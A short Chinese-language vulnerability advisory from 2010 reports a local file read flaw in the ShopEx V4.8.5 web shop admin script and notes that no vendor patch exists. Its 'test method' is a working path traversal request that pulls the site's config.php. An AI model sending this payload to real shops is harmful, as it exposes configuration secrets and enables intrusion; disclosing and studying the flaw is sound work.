ShopEx网上商店系统/shopadmin/index.php 本地文件读取漏洞

来源:岁月联盟 编辑:老鹰 时间:2010-06-04

影响版本:
Shopex V4.8.5

漏洞描述:
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统。

index.php在对参数的处理过程中存在本地文件读取漏洞

测试方法:

http://******.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

安全建议:
厂商补丁:

ShopEx.cn
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.ShopEx.cn

上一篇:TCExam admin/code/tce_functions_tcecode_editor.php脚本任意文件上传漏洞
下一篇:phpmps 2.0 GBK Help.php $keywords SQL注入漏洞

最近更新

随机推荐